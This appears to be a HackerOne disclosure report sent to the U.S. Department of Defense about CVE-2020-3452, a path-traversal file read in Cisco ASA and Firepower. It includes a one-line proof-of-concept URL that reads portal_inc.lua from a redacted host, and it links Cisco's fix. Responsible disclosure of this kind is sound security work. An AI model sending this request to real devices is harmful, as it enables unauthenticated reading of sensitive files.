Lucene search

K
hackeroneAmrrH1:951508
HistoryAug 05, 2020 - 10:21 a.m.

U.S. Dept Of Defense: CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.

2020-08-0510:21:56
amrr
hackerone.com
192

EPSS

0.975

Percentile

100.0%

Summary:
#The affected IP:
█████

Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
For example to read “/+CSCOE+/portal_inc.lua” file.

for example:

████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=…/

Suggested Mitigation/Remediation Actions

Cisco has released the fix https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

Impact

This vulnerability allows an unauthenticated, remote attacker to perform directory traversal attacks and read sensitive files on the system.